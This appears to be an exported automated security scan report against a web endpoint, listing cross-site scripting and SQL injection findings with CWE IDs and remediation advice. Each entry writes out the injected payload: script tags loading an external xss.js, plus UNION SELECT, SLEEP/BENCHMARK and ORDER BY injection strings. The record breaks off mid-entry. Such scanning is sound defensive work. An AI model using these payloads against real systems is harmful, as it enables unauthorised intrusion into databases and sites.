Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <SCRIPT a=\">'>\" SRC=\"http://soapui.org/xss.js\"></\nSCRIPT>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #313\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT SRC=\"\nhttp://soapui.org/xss.js\"></SCRIPT>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #314\nSQL Injection\nSQL Injection Scans work through a list of predefined strings that could be used to execute arbitrary \nSQL code in a database, and inserts those strings into the parameters of the request.\nIf an unexpected response is received, this is an indication that input validation has failed to remove the potentially malicious SQL strings from the parameters, and that data should be sanitized before it \nis used to construct SQL queries.\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io'-'\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #315\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io and (select substring(@@version,2,1))='i'\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #316\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 4--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #317\nSQL InjectionScan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io benchmark(50000000,MD5(1))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #318\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io' or ''&'\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/png\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #319\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io'--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #320\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #321\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #322\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(\n1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #323\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19ResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #324\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io test UNION select 1, @@version, 1, 1;\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89Issue Number #325\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 20\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #326\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName 